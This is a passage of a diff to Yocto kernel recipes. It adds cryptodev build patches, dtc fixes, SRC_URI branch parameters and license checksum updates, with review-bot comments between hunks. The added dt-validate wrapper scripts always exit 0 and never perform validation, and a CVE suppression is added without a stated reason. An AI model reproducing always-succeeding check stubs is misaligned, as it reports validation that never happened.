- ${PN}-extension-extmod \
- ${PN}-extension-dbe \
- "
-RCONFLICTS_${PN} = "${PN}-extension-dri \
- ${PN}-extension-dri2 \
- ${PN}-extension-record \
- ${PN}-extension-extmod \
- ${PN}-extension-dbe \
- "
diff --git a/meta/recipes-kernel/blktrace/blktrace_git.bb b/meta/recipes-kernel/blktrace/blktrace_git.bb
index 6903053b5b..2110bc75fa 100644
--- a/meta/recipes-kernel/blktrace/blktrace_git.bb
+++ b/meta/recipes-kernel/blktrace/blktrace_git.bb
@@ -1,4 +1,9 @@
SUMMARY = "Generates traces of I/O traffic on block devices"
+DESCRIPTION = "blktrace is a block layer IO tracing mechanism which provides \
+detailed information about request queue operations up to user space. There \
+are three major components: a kernel component, a utility to record the i/o \
+trace information for the kernel to user space, and utilities to analyse and \
+view the trace information."
HOMEPAGE = "http://brick.kernel.dk/snaps/"
LICENSE = "GPLv2"
LIC_FILES_CHKSUM = "file://COPYING;md5=393a5ca445f6965873eca0259a17f833"
@@ -9,7 +14,7 @@ SRCREV = "cca113f2fe0759b91fd6a0e10fdcda2c28f18a7e"
PV = "1.2.0+git${SRCPV}"
-SRC_URI = "git://git.kernel.dk/blktrace.git \
+SRC_URI = "git://git.kernel.dk/blktrace.git;branch=master \
file://ldflags.patch \
file://CVE-2018-10689.patch \
file://make-btt-scripts-python3-ready.patch \
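Review bot: The updated `SRC_URI` keeps the `git://` scheme and adds only `;branch=master`, so with no `protocol=` parameter the fetch presumably still uses the unauthenticated git protocol. `SRCREV` pins the commit, which limits what a tampered transport could deliver. The cryptodev.inc change in this same diff also adds `;protocol=https`, and doing the same here would be consistent if the server offers HTTPS: `git://git.kernel.dk/blktrace.git;branch=master;protocol=https`. The dtc.inc hunk (`git://git.kernel.org/pub/scm/utils/dtc/dtc.git;branch=master`) has the same gap.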
diff --git a/meta/recipes-kernel/cryptodev/cryptodev-module_1.10.bb b/meta/recipes-kernel/cryptodev/cryptodev-module_1.10.bb
index 552eb6abaa..d7c7918515 100644
--- a/meta/recipes-kernel/cryptodev/cryptodev-module_1.10.bb
+++ b/meta/recipes-kernel/cryptodev/cryptodev-module_1.10.bb
@@ -9,6 +9,9 @@ DEPENDS += "cryptodev-linux"
SRC_URI += " \
file://0001-Disable-installing-header-file-provided-by-another-p.patch \
+file://0001-Fix-build-for-Linux-5.8-rc1.patch \
+file://0001-Fix-build-for-Linux-5.9-rc1.patch \
+file://fix-build-for-Linux-5.11-rc1.patch \
"
EXTRA_OEMAKE='KERNEL_DIR="${STAGING_KERNEL_DIR}" PREFIX="${D}"'
diff --git a/meta/recipes-kernel/cryptodev/cryptodev.inc b/meta/recipes-kernel/cryptodev/cryptodev.inc
index f99f8bc9f0..f02619cabe 100644
--- a/meta/recipes-kernel/cryptodev/cryptodev.inc
+++ b/meta/recipes-kernel/cryptodev/cryptodev.inc
@@ -1,9 +1,14 @@
HOMEPAGE = "http://cryptodev-linux.org/"
+DESCRIPTION = "Cryptodev-linux is a device that allows access to Linux kernel \
+cryptographic drivers; thus allowing of userspace applications to take advantage \
+of hardware accelerators. Cryptodev-linux is implemented as a standalone \
+module that requires no dependencies other than a stock linux kernel. Its \
+API is compatible with OpenBSD's cryptodev userspace API (/dev/crypto)."
LICENSE = "GPLv2"
LIC_FILES_CHKSUM = "file://COPYING;md5=b234ee4d69f5fce4486a80fdaf4a4263"
-SRC_URI = "git://github.com/cryptodev-linux/cryptodev-linux \
+SRC_URI = "git://github.com/cryptodev-linux/cryptodev-linux;branch=master;protocol=https \
"
SRCREV = "a87053bee5680878c295b7d23cf0d7065576ac2b"
diff --git a/meta/recipes-kernel/cryptodev/files/0001-Fix-build-for-Linux-5.8-rc1.patch b/meta/recipes-kernel/cryptodev/files/0001-Fix-build-for-Linux-5.8-rc1.patch
new file mode 100644
index 0000000000..02c721a4f3
--- /dev/null
+++ b/meta/recipes-kernel/cryptodev/files/0001-Fix-build-for-Linux-5.8-rc1.patch
@@ -0,0 +1,49 @@
+From 9e765068582aae3696520346a7500322ca6cc2de Mon Sep 17 00:00:00 2001
+From: Joan Bruguera <joanbrugueram@gmail.com>
+Date: Sat, 13 Jun 2020 19:46:44 +0200
+Subject: [PATCH] Fix build for Linux 5.8-rc1
+
+See also: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=9740ca4e95b43b91a4a848694a20d01ba6818f7b
+ https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=da1c55f1b272f4bd54671d459b39ea7b54944ef9
+ https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=d8ed45c5dcd455fc5848d47f86883a1b872ac0d0
+
+Signed-off-by: Joan Bruguera <joanbrugueram@gmail.com>
+
+Upstream-Status: Backport [9e765068582aae3696520346a7500322ca6cc2de]
+
+Signed-off-by: He Zhe <zhe.he@windriver.com>
+---
+ zc.c | 8 ++++++++
+ 1 file changed, 8 insertions(+)
+
+diff --git a/zc.c b/zc.c
+index ae464ff..2c286bb 100644
+--- a/zc.c
++++ b/zc.c
+@@ -58,7 +58,11 @@ int __get_userbuf(uint8_t __user *addr, uint32_t len, int write,
+ return 0;
+ }
+
++#if (LINUX_VERSION_CODE < KERNEL_VERSION(5, 8, 0))
+ down_read(&mm->mmap_sem);
++#else
++ mmap_read_lock(mm);
++#endif
+ #if (LINUX_VERSION_CODE < KERNEL_VERSION(4, 6, 0))
+ ret = get_user_pages(task, mm,
+ (unsigned long)addr, pgcount, write, 0, pg, NULL);
+@@ -74,7 +78,11 @@ int __get_userbuf(uint8_t __user *addr, uint32_t len, int write,
+ (unsigned long)addr, pgcount, write ? FOLL_WRITE : 0,
+ pg, NULL, NULL);
+ #endif
++#if (LINUX_VERSION_CODE < KERNEL_VERSION(5, 8, 0))
+ up_read(&mm->mmap_sem);
++#else
++ mmap_read_unlock(mm);
++#endif
+ if (ret != pgcount)
+ return -EINVAL;
+
+--
+2.17.1
+
diff --git a/meta/recipes-kernel/cryptodev/files/0001-Fix-build-for-Linux-5.9-rc1.patch b/meta/recipes-kernel/cryptodev/files/0001-Fix-build-for-Linux-5.9-rc1.patch
new file mode 100644
index 0000000000..cf1c04df9e
--- /dev/null
+++ b/meta/recipes-kernel/cryptodev/files/0001-Fix-build-for-Linux-5.9-rc1.patch
@@ -0,0 +1,42 @@
+From 2f5e08aebf9229599aae7f25db752f74221cd71d Mon Sep 17 00:00:00 2001
+From: Joan Bruguera <joanbrugueram@gmail.com>
+Date: Fri, 14 Aug 2020 00:13:38 +0200
+Subject: [PATCH] Fix build for Linux 5.9-rc1
+
+See also: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=64019a2e467a288a16b65ab55ddcbf58c1b00187
+ https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=bce617edecada007aee8610fbe2c14d10b8de2f6
+ https://lore.kernel.org/lkml/CAHk-=wj_V2Tps2QrMn20_W0OJF9xqNh52XSGA42s-ZJ8Y+GyKw@mail.gmail.com/
+
+Signed-off-by: Joan Bruguera <joanbrugueram@gmail.com>
+
+Upstream-Status: Backport [https://github.com/cryptodev-linux/cryptodev-linux/commit/2f5e08aebf9229599aae7f25db752f74221cd71d]
+
+Signed-off-by: Naveen Saini <naveen.kumar.saini@intel.com>
+
+---
+ zc.c | 6 +++++-
+ 1 file changed, 5 insertions(+), 1 deletion(-)
+
+diff --git a/zc.c b/zc.c
+index a560db5..fdf7da1 100644
+--- a/zc.c
++++ b/zc.c
+@@ -76,10 +76,14 @@ int __get_userbuf(uint8_t __user *addr, uint32_t len, int write,
+ ret = get_user_pages_remote(task, mm,
+ (unsigned long)addr, pgcount, write ? FOLL_WRITE : 0,
+ pg, NULL);
+-#else
++#elif (LINUX_VERSION_CODE < KERNEL_VERSION(5, 9, 0))
+ ret = get_user_pages_remote(task, mm,
+ (unsigned long)addr, pgcount, write ? FOLL_WRITE : 0,
+ pg, NULL, NULL);
++#else
++ ret = get_user_pages_remote(mm,
++ (unsigned long)addr, pgcount, write ? FOLL_WRITE : 0,
++ pg, NULL, NULL);
+ #endif
+ #if (LINUX_VERSION_CODE < KERNEL_VERSION(5, 8, 0))
+ up_read(&mm->mmap_sem);
+--
+2.17.1
+
diff --git a/meta/recipes-kernel/cryptodev/files/fix-build-for-Linux-5.11-rc1.patch b/meta/recipes-kernel/cryptodev/files/fix-build-for-Linux-5.11-rc1.patch
new file mode 100644
index 0000000000..3ae77cb9d6
--- /dev/null
+++ b/meta/recipes-kernel/cryptodev/files/fix-build-for-Linux-5.11-rc1.patch
@@ -0,0 +1,32 @@
+From 55c6315058fc0dd189ffd116f2cc27ba4fa84cb6 Mon Sep 17 00:00:00 2001
+From: Joan Bruguera <joanbrugueram@gmail.com>
+Date: Mon, 28 Dec 2020 01:41:31 +0100
+Subject: [PATCH] Fix build for Linux 5.11-rc1
+
+ksys_close was removed, as far as I can tell, close_fd replaces it.
+
+See also: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=8760c909f54a82aaa6e76da19afe798a0c77c3c3
+ https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=1572bfdf21d4d50e51941498ffe0b56c2289f783
+
+Upstream-Status: Backport [https://github.com/cryptodev-linux/cryptodev-linux/commit/55c6315058fc0dd189ffd116f2cc27ba4fa84cb6]
+Signed-off-by: Anuj Mittal <anuj.mittal@intel.com>
+---
+ ioctl.c | 4 +++-
+ 1 file changed, 3 insertions(+), 1 deletion(-)
+
+diff --git a/ioctl.c b/ioctl.c
+index 3d332380..95481d4f 100644
+--- a/ioctl.c
++++ b/ioctl.c
+@@ -871,8 +871,10 @@ cryptodev_ioctl(struct file *filp, unsigned int cmd, unsigned long arg_)
+ if (unlikely(ret)) {
+ #if (LINUX_VERSION_CODE < KERNEL_VERSION(4, 17, 0))
+ sys_close(fd);
+-#else
++#elif (LINUX_VERSION_CODE < KERNEL_VERSION(5, 11, 0))
+ ksys_close(fd);
++#else
++ close_fd(fd);
+ #endif
+ return ret;
+ }
diff --git a/meta/recipes-kernel/dtc/dtc.inc b/meta/recipes-kernel/dtc/dtc.inc
index 0650e3c82e..461ab8fbd3 100644
--- a/meta/recipes-kernel/dtc/dtc.inc
+++ b/meta/recipes-kernel/dtc/dtc.inc
@@ -5,9 +5,11 @@ SECTION = "bootloader"
LICENSE = "GPLv2 | BSD"
DEPENDS = "flex-native bison-native"
-SRC_URI = "git://git.kernel.org/pub/scm/utils/dtc/dtc.git \
+SRC_URI = "git://git.kernel.org/pub/scm/utils/dtc/dtc.git;branch=master \
file://make_install.patch \
+ file://0001-dtc-Fix-Makefile-to-add-CFLAGS-not-override.patch \
"
+
UPSTREAM_CHECK_GITTAGREGEX = "v(?P<pver>\d+(\.\d+)+)"
EXTRA_OEMAKE='NO_PYTHON=1 PREFIX="${prefix}" LIBDIR="${libdir}" DESTDIR="${D}"'
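Review bot: The `SRC_URI` entry touched here still fetches over the plain `git://` protocol, which has no transport authentication or encryption. Since the line is already being edited to add `branch=master`, it could also carry `;protocol=https`, e.g. `git://git.kernel.org/pub/scm/utils/dtc/dtc.git;protocol=https;branch=master`, assuming the server offers the repository over HTTPS. The pinned `SRCREV` in dtc_1.6.0.bb limits what a tampered transfer could deliver, but an authenticated transport removes the dependence on that alone. The same applies to the `SRC_URI` changes in kern-tools-native_git.bb and kmod.inc further down; the linux-firmware `SRC_URI:class-devupstream` entry already uses `protocol=https`.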
diff --git a/meta/recipes-kernel/dtc/dtc/0001-dtc-Fix-Makefile-to-add-CFLAGS-not-override.patch b/meta/recipes-kernel/dtc/dtc/0001-dtc-Fix-Makefile-to-add-CFLAGS-not-override.patch
new file mode 100644
index 0000000000..a2deb12d4b
--- /dev/null
+++ b/meta/recipes-kernel/dtc/dtc/0001-dtc-Fix-Makefile-to-add-CFLAGS-not-override.patch
@@ -0,0 +1,36 @@
+From f0119060ef1b9bd80e2cae487df1e4aedffb0e9b Mon Sep 17 00:00:00 2001
+From: Oleksiy Obitotskyy <oobitots@cisco.com>
+Date: Fri, 22 Jan 2021 09:12:48 +0200
+Subject: [PATCH] dtc: Fix Makefile to add CFLAGS not override
+
+Makefile override CFLAGS not extend them, so some of them
+missing. Sources builds out of kernel tree and probably not all
+options could be used (?). We need at least -fmacro-prefix-map/
+debug-prefix-map to eliminate absolute path in binaries.
+
+Upstream-Status: Pending
+Signed-off-by: Oleksiy Obitotskyy <oobitots@cisco.com>
+---
+ Makefile | 4 ++--
+ 1 file changed, 2 insertions(+), 2 deletions(-)
+
+diff --git a/Makefile b/Makefile
+index 35d936f..b5b13cf 100644
+--- a/Makefile
++++ b/Makefile
+@@ -20,10 +20,10 @@ CONFIG_LOCALVERSION =
+ # See libfdt_internal.h for details
+ ASSUME_MASK ?= 0
+
+-CPPFLAGS = -I libfdt -I . -DFDT_ASSUME_MASK=$(ASSUME_MASK)
++CPPFLAGS += -I libfdt -I . -DFDT_ASSUME_MASK=$(ASSUME_MASK)
+ WARNINGS = -Wall -Wpointer-arith -Wcast-qual -Wnested-externs \
+ -Wstrict-prototypes -Wmissing-prototypes -Wredundant-decls -Wshadow
+-CFLAGS = -g -Os $(SHAREDLIB_CFLAGS) -Werror $(WARNINGS) $(EXTRA_CFLAGS)
++CFLAGS += -g -Os $(SHAREDLIB_CFLAGS) -Werror $(WARNINGS) $(EXTRA_CFLAGS)
+
+ BISON = bison
+ LEX = flex
+--
+2.25.1
+
diff --git a/meta/recipes-kernel/dtc/dtc/0001-fdtdump-Fix-gcc11-warning.patch b/meta/recipes-kernel/dtc/dtc/0001-fdtdump-Fix-gcc11-warning.patch
new file mode 100644
index 0000000000..ec825cbf7b
--- /dev/null
+++ b/meta/recipes-kernel/dtc/dtc/0001-fdtdump-Fix-gcc11-warning.patch
@@ -0,0 +1,35 @@
+From 4827e0db6c4f7dea7f4094f49d3bb48ef6dfdc2d Mon Sep 17 00:00:00 2001
+From: David Gibson <david@gibson.dropbear.id.au>
+Date: Wed, 6 Jan 2021 14:52:26 +1100
+Subject: [PATCH] fdtdump: Fix gcc11 warning
+
+In one place, fdtdump abuses fdt_set_magic(), passing it just a small char
+array instead of the full fdt header it expects. That's relying on the
+fact that in fact fdt_set_magic() will only actually access the first 4
+bytes of the buffer.
+
+This trips a new warning in GCC 11 - and it's entirely possible it was
+always UB. So, don't do that.
+
+Upstream-Status: Backport [https://git.kernel.org/pub/scm/utils/dtc/dtc.git/patch/?id=ca16a723fa9dde9c5da80dba567f48715000e77c]
+Signed-off-by: David Gibson <david@gibson.dropbear.id.au>
+---
+ fdtdump.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/fdtdump.c b/fdtdump.c
+index 9613bef..d9fb374 100644
+--- a/fdtdump.c
++++ b/fdtdump.c
+@@ -217,7 +217,7 @@ int main(int argc, char *argv[])
+ char *p = buf;
+ char *endp = buf + len;
+
+- fdt_set_magic(smagic, FDT_MAGIC);
++ fdt32_st(smagic, FDT_MAGIC);
+
+ /* poor man's memmem */
+ while ((endp - p) >= FDT_MAGIC_SIZE) {
+--
+2.30.1
+
diff --git a/meta/recipes-kernel/dtc/dtc_1.6.0.bb b/meta/recipes-kernel/dtc/dtc_1.6.0.bb
index 92df70d9fc..a407137859 100644
--- a/meta/recipes-kernel/dtc/dtc_1.6.0.bb
+++ b/meta/recipes-kernel/dtc/dtc_1.6.0.bb
@@ -5,6 +5,8 @@ LIC_FILES_CHKSUM = "file://GPL;md5=b234ee4d69f5fce4486a80fdaf4a4263 \
SRCREV = "2525da3dba9beceb96651dc2986581871dbeca30"
+SRC_URI += "file://0001-fdtdump-Fix-gcc11-warning.patch"
+
S = "${WORKDIR}/git"
BBCLASSEXTEND = "native nativesdk"
diff --git a/meta/recipes-kernel/dtc/python3-dtschema-wrapper/dt-doc-validate b/meta/recipes-kernel/dtc/python3-dtschema-wrapper/dt-doc-validate
new file mode 100644
index 0000000000..2aa57851c7
--- /dev/null
+++ b/meta/recipes-kernel/dtc/python3-dtschema-wrapper/dt-doc-validate
@@ -0,0 +1,20 @@
+#!/bin/sh
+# dt-doc-validate wrapper to allow kernel dt-validation to pass
+#
+# Copyright (C) 2021 Bruce Ashfield <bruce.ashfield@gmail.com>
+# License: MIT (see COPYING.MIT at the root of the repository for terms)
+
+for arg; do
+ case "$arg" in
+ --version)
+ echo "v2021.10"
+ ;;
+ esac
+done
+
+# TBD: left for future consideration
+# exec dt-doc-validate.real "$@"
+
+# we always succeed
+exit 0
+
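Review bot: This wrapper exits 0 for every invocation and answers `--version` with a fixed `v2021.10`, so a caller that relies on dt-doc-validate to reject a malformed binding sees success without any check having run. The header comment explains the intent, but nothing at run time shows that validation was skipped. A line such as `echo "dt-doc-validate: stub wrapper, no schema validation performed" >&2` before `exit 0` would put that in the build log, provided the kernel build tolerates stderr output from the tool. The recipe `DESCRIPTION` in python3-dtschema-wrapper_2021.10.bb could likewise say that these are no-op stubs. dt-mk-schema and dt-validate below are identical and need the same treatment.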
diff --git a/meta/recipes-kernel/dtc/python3-dtschema-wrapper/dt-mk-schema b/meta/recipes-kernel/dtc/python3-dtschema-wrapper/dt-mk-schema
new file mode 100644
index 0000000000..24b89d8619
--- /dev/null
+++ b/meta/recipes-kernel/dtc/python3-dtschema-wrapper/dt-mk-schema
@@ -0,0 +1,20 @@
+#!/bin/sh
+# dt-mk-schema wrapper to allow kernel dt-validation to pass
+#
+# Copyright (C) 2021 Bruce Ashfield <bruce.ashfield@gmail.com>
+# License: MIT (see COPYING.MIT at the root of the repository for terms)
+
+for arg; do
+ case "$arg" in
+ --version)
+ echo "v2021.10"
+ ;;
+ esac
+done
+
+# TBD: left for future consideration
+# exec dt-mk-schema.real "$@"
+
+# we always succeed
+exit 0
+
diff --git a/meta/recipes-kernel/dtc/python3-dtschema-wrapper/dt-validate b/meta/recipes-kernel/dtc/python3-dtschema-wrapper/dt-validate
new file mode 100644
index 0000000000..8a4710a7ed
--- /dev/null
+++ b/meta/recipes-kernel/dtc/python3-dtschema-wrapper/dt-validate
@@ -0,0 +1,20 @@
+#!/bin/sh
+# dt-validate wrapper to allow kernel dt-validation to pass
+#
+# Copyright (C) 2021 Bruce Ashfield <bruce.ashfield@gmail.com>
+# License: MIT (see COPYING.MIT at the root of the repository for terms)
+
+for arg; do
+ case "$arg" in
+ --version)
+ echo "v2021.10"
+ ;;
+ esac
+done
+
+# TBD: left for future consideration
+# exec dt-validate.real "$@"
+
+# we always succeed
+exit 0
+
diff --git a/meta/recipes-kernel/dtc/python3-dtschema-wrapper_2021.10.bb b/meta/recipes-kernel/dtc/python3-dtschema-wrapper_2021.10.bb
new file mode 100644
index 0000000000..c869274d09
--- /dev/null
+++ b/meta/recipes-kernel/dtc/python3-dtschema-wrapper_2021.10.bb
@@ -0,0 +1,17 @@
+DESCRIPTION = "Wrapper for tooling for devicetree validation using YAML and jsonschema"
+HOMEPAGE = "https://yoctoproject.org"
+LICENSE = "MIT"
+LIC_FILES_CHKSUM = "file://${COREBASE}/meta/COPYING.MIT;md5=3da9cfbcb788c80a0384361b4de20420"
+
+SRC_URI = "file://dt-doc-validate \
+ file://dt-mk-schema \
+ file://dt-validate"
+
+do_install() {
+ install -d ${D}${bindir}/
+ install -m 755 ${WORKDIR}/dt-doc-validate ${D}${bindir}/
+ install -m 755 ${WORKDIR}/dt-mk-schema ${D}${bindir}/
+ install -m 755 ${WORKDIR}/dt-validate ${D}${bindir}/
+}
+
+BBCLASSEXTEND = "native nativesdk"
diff --git a/meta/recipes-kernel/kern-tools/kern-tools-native_git.bb b/meta/recipes-kernel/kern-tools/kern-tools-native_git.bb
index 4f1af731d6..82d678e509 100644
--- a/meta/recipes-kernel/kern-tools/kern-tools-native_git.bb
+++ b/meta/recipes-kernel/kern-tools/kern-tools-native_git.bb
@@ -1,4 +1,8 @@
SUMMARY = "Tools for managing Yocto Project style branched kernels"
+DESCRIPTION = "Powerful set of tools or managing Yocto Linux kernel sources \
+and configuration data. You can use these tools to make a single configuration \
+change, apply multiple patches, or work with your own kernel sources."
+HOMEPAGE = "https://www.yoctoproject.org/"
LICENSE = "GPLv2"
LIC_FILES_CHKSUM = "file://tools/kgit;beginline=5;endline=9;md5=9c30e971d435e249624278c3e343e501"
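Review bot: The new `DESCRIPTION` has a typo, "Powerful set of tools or managing", which should read `Powerful set of tools for managing Yocto Linux kernel sources`. This string ends up in package metadata, so it is worth fixing before it is merged.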
@@ -10,7 +14,7 @@ PV = "0.2+git${SRCPV}"
inherit native
-SRC_URI = "git://git.yoctoproject.org/yocto-kernel-tools.git"
+SRC_URI = "git://git.yoctoproject.org/yocto-kernel-tools.git;branch=master"
S = "${WORKDIR}/git"
UPSTREAM_CHECK_COMMITS = "1"
diff --git a/meta/recipes-kernel/kexec/kexec-tools_2.0.20.bb b/meta/recipes-kernel/kexec/kexec-tools_2.0.20.bb
index 871b36440f..206c6ccae7 100644
--- a/meta/recipes-kernel/kexec/kexec-tools_2.0.20.bb
+++ b/meta/recipes-kernel/kexec/kexec-tools_2.0.20.bb
@@ -30,6 +30,9 @@ inherit autotools update-rc.d systemd
export LDFLAGS = "-L${STAGING_LIBDIR}"
EXTRA_OECONF = " --with-zlib=yes"
+# affects kexec-tools shipped by Fedora versions prior to 2.0.21-8 and RHEL versions prior to 2.0.20-47.
+CVE_CHECK_WHITELIST += "CVE-2021-20269"
+
do_compile_prepend() {
# Remove the prepackaged config.h from the source tree as it overrides
# the same file generated by configure and placed in the build tree
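Review bot: The comment above `CVE_CHECK_WHITELIST += "CVE-2021-20269"` names the distro packages that are affected but does not say why this recipe is not, and that reason is what a later auditor needs to trust the suppression. If the reasoning is that the flaw lives in the Fedora/RHEL packaging rather than in the upstream source built here, state it directly, e.g. `# CVE-2021-20269 is specific to the Fedora/RHEL packaging of kexec-tools; the upstream source built here is not affected`. The entry permanently silences the CVE checker for this identifier, so the justification should be verifiable from the recipe alone.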
diff --git a/meta/recipes-kernel/kmod/kmod.inc b/meta/recipes-kernel/kmod/kmod.inc
index 5dae30ed88..631b50658a 100644
--- a/meta/recipes-kernel/kmod/kmod.inc
+++ b/meta/recipes-kernel/kmod/kmod.inc
@@ -18,7 +18,7 @@ SRCREV = "58133a96c894c043e48c74ddf0bfe8db90bac62f"
# Lookout for PV bump too when SRCREV is changed
PV = "26"
-SRC_URI = "git://git.kernel.org/pub/scm/utils/kernel/kmod/kmod.git \
+SRC_URI = "git://git.kernel.org/pub/scm/utils/kernel/kmod/kmod.git;branch=master \
file://depmod-search.conf \
file://0001-build-Stop-using-dolt.patch \
file://avoid_parallel_tests.patch \
@@ -26,7 +26,6 @@ SRC_URI = "git://git.kernel.org/pub/scm/utils/kernel/kmod/kmod.git \
S = "${WORKDIR}/git"
-EXTRA_AUTORECONF += "--install --symlink"
EXTRA_OECONF +=" --enable-tools --with-zlib"
PACKAGECONFIG[debug] = "--enable-debug,--disable-debug"
diff --git a/meta/recipes-kernel/kmod/kmod/ptest.patch b/meta/recipes-kernel/kmod/kmod/ptest.patch
deleted file mode 100644
index 831dbcb909..0000000000
--- a/meta/recipes-kernel/kmod/kmod/ptest.patch
+++ /dev/null
@@ -1,25 +0,0 @@
-Add 'install-ptest' rule.
-
-Signed-off-by: Tudor Florea <tudor.florea@enea.com>
-Upstream-Status: Pending
-
-diff -ruN a/Makefile.am b/Makefile.am
---- a/Makefile.am 2013-07-12 17:11:05.278331557 +0200
-+++ b/Makefile.am 2013-07-12 17:14:27.033788016 +0200
-@@ -204,6 +204,16 @@
-
- distclean-local: $(DISTCLEAN_LOCAL_HOOKS)
-
-+install-ptest:
-+ @$(MKDIR_P) $(DESTDIR)/testsuite
-+ @for file in $(TESTSUITE); do \
-+ install $$file $(DESTDIR)/testsuite; \
-+ done;
-+ @sed -e 's/^Makefile/_Makefile/' < Makefile > $(DESTDIR)/Makefile
-+ @$(MKDIR_P) $(DESTDIR)/tools
-+ @cp $(noinst_SCRIPTS) $(noinst_PROGRAMS) $(DESTDIR)/tools
-+ @cp -r testsuite/rootfs testsuite/.libs $(DESTDIR)/testsuite
-+
- # ------------------------------------------------------------------------------
- # custom release helpers
- # ------------------------------------------------------------------------------
diff --git a/meta/recipes-kernel/linux-firmware/linux-firmware_20201022.bb b/meta/recipes-kernel/linux-firmware/linux-firmware_20240220.bb
index 045f2647e0..873ba9cdf0 100644
--- a/meta/recipes-kernel/linux-firmware/linux-firmware_20201022.bb
+++ b/meta/recipes-kernel/linux-firmware/linux-firmware_20240220.bb
@@ -1,4 +1,8 @@
SUMMARY = "Firmware files for use with Linux kernel"
+HOMEPAGE = "https://www.kernel.org/"
+DESCRIPTION = "Linux firmware is a package distributed alongside the Linux kernel \
+that contains firmware binary blobs necessary for partial or full functionality \
+of certain hardware devices."
SECTION = "kernel"
LICENSE = "\
@@ -23,7 +27,6 @@ LICENSE = "\
& Firmware-go7007 \
& Firmware-GPLv2 \
& Firmware-hfi1_firmware \
- & Firmware-i2400m \
& Firmware-i915 \
& Firmware-ibt_firmware \
& Firmware-ice \
@@ -31,6 +34,7 @@ LICENSE = "\
& Firmware-iwlwifi_firmware \
& Firmware-IntcSST2 \
& Firmware-kaweth \
+ & Firmware-Lontium \
& Firmware-Marvell \
& Firmware-moxa \
& Firmware-myri10ge_firmware \
@@ -41,6 +45,7 @@ LICENSE = "\
& Firmware-phanfw \
& Firmware-qat \
& Firmware-qcom \
+ & Firmware-qcom-yamato \
& Firmware-qla1280 \
& Firmware-qla2xxx \
& Firmware-qualcommAthos_ar3k \
@@ -52,7 +57,6 @@ LICENSE = "\
& Firmware-rtlwifi_firmware \
& Firmware-imx-sdma_firmware \
& Firmware-siano \
- & Firmware-tda7706-firmware \
& Firmware-ti-connectivity \
& Firmware-ti-keystone \
& Firmware-ueagle-atm4-firmware \
@@ -67,8 +71,8 @@ LICENSE = "\
LIC_FILES_CHKSUM = "file://LICENCE.Abilis;md5=b5ee3f410780e56711ad48eadc22b8bc \
file://LICENCE.adsp_sst;md5=615c45b91a5a4a9fe046d6ab9a2df728 \
file://LICENCE.agere;md5=af0133de6b4a9b2522defd5f188afd31 \
- file://LICENSE.amdgpu;md5=d357524f5099e2a3db3c1838921c593f \
- file://LICENSE.amd-ucode;md5=3c5399dc9148d7f0e1f41e34b69cf14f \
+ file://LICENSE.amdgpu;md5=a2589a05ea5b6bd2b7f4f623c7e7a649 \
+ file://LICENSE.amd-ucode;md5=6ca90c57f7b248de1e25c7f68ffc4698 \
file://LICENSE.amlogic_vdec;md5=dc44f59bf64a81643e500ad3f39a468a \
file://LICENCE.atheros_firmware;md5=30a14c7823beedac9fa39c64fdd01a13 \
file://LICENSE.atmel;md5=aa74ac0c60595dee4d4e239107ea77a3 \
@@ -86,14 +90,14 @@ LIC_FILES_CHKSUM = "file://LICENCE.Abilis;md5=b5ee3f410780e56711ad48eadc22b8bc \
file://LICENCE.go7007;md5=c0bb9f6aaaba55b0529ee9b30aa66beb \
file://GPL-2;md5=b234ee4d69f5fce4486a80fdaf4a4263 \
file://LICENSE.hfi1_firmware;md5=5e7b6e586ce7339d12689e49931ad444 \
- file://LICENCE.i2400m;md5=14b901969e23c41881327c0d9e4b7d36 \
file://LICENSE.i915;md5=2b0b2e0d20984affd4490ba2cba02570 \
file://LICENCE.ibt_firmware;md5=fdbee1ddfe0fb7ab0b2fcd6b454a366b \
file://LICENSE.ice;md5=742ab4850f2670792940e6d15c974b2f \
file://LICENCE.IntcSST2;md5=9e7d8bea77612d7cc7d9e9b54b623062 \
file://LICENCE.it913x;md5=1fbf727bfb6a949810c4dbfa7e6ce4f8 \
- file://LICENCE.iwlwifi_firmware;md5=3fd842911ea93c29cd32679aa23e1c88 \
+ file://LICENCE.iwlwifi_firmware;md5=2ce6786e0fc11ac6e36b54bb9b799f1b \
file://LICENCE.kaweth;md5=b1d876e562f4b3b8d391ad8395dfe03f \
+ file://LICENSE.Lontium;md5=4ec8dc582ff7295f39e2ca6a7b0be2b6 \
file://LICENCE.Marvell;md5=28b6ed8bd04ba105af6e4dcd6e997772 \
file://LICENCE.mediatek;md5=7c1976b63217d76ce47d0a11d8a79cf2 \
file://LICENCE.moxa;md5=1086614767d8ccf744a923289d3d4261 \
@@ -104,8 +108,9 @@ LIC_FILES_CHKSUM = "file://LICENCE.Abilis;md5=b5ee3f410780e56711ad48eadc22b8bc \
file://LICENCE.OLPC;md5=5b917f9d8c061991be4f6f5f108719cd \
file://LICENCE.open-ath9k-htc-firmware;md5=1b33c9f4d17bc4d457bdb23727046837 \
file://LICENCE.phanfw;md5=954dcec0e051f9409812b561ea743bfa \
- file://LICENCE.qat_firmware;md5=9e7d8bea77612d7cc7d9e9b54b623062 \
+ file://LICENCE.qat_firmware;md5=72de83dfd9b87be7685ed099a39fbea4 \
file://LICENSE.qcom;md5=164e3362a538eb11d3ac51e8e134294b \
+ file://LICENSE.qcom_yamato;md5=d0de0eeccaf1843a850bf7a6777eec5c \
file://LICENCE.qla1280;md5=d6895732e622d950609093223a2c4f5d \
file://LICENCE.qla2xxx;md5=505855e921b75f1be4a437ad9b79dff0 \
file://LICENSE.QualcommAtheros_ar3k;md5=b5fe244fb2b532311de1472a3bc06da5 \
@@ -117,7 +122,6 @@ LIC_FILES_CHKSUM = "file://LICENCE.Abilis;md5=b5ee3f410780e56711ad48eadc22b8bc \
file://LICENCE.rtlwifi_firmware.txt;md5=00d06cfd3eddd5a2698948ead2ad54a5 \
file://LICENSE.sdma_firmware;md5=51e8c19ecc2270f4b8ea30341ad63ce9 \
file://LICENCE.siano;md5=4556c1bf830067f12ca151ad953ec2a5 \
- file://LICENCE.tda7706-firmware.txt;md5=835997cf5e3c131d0dddd695c7d9103e \
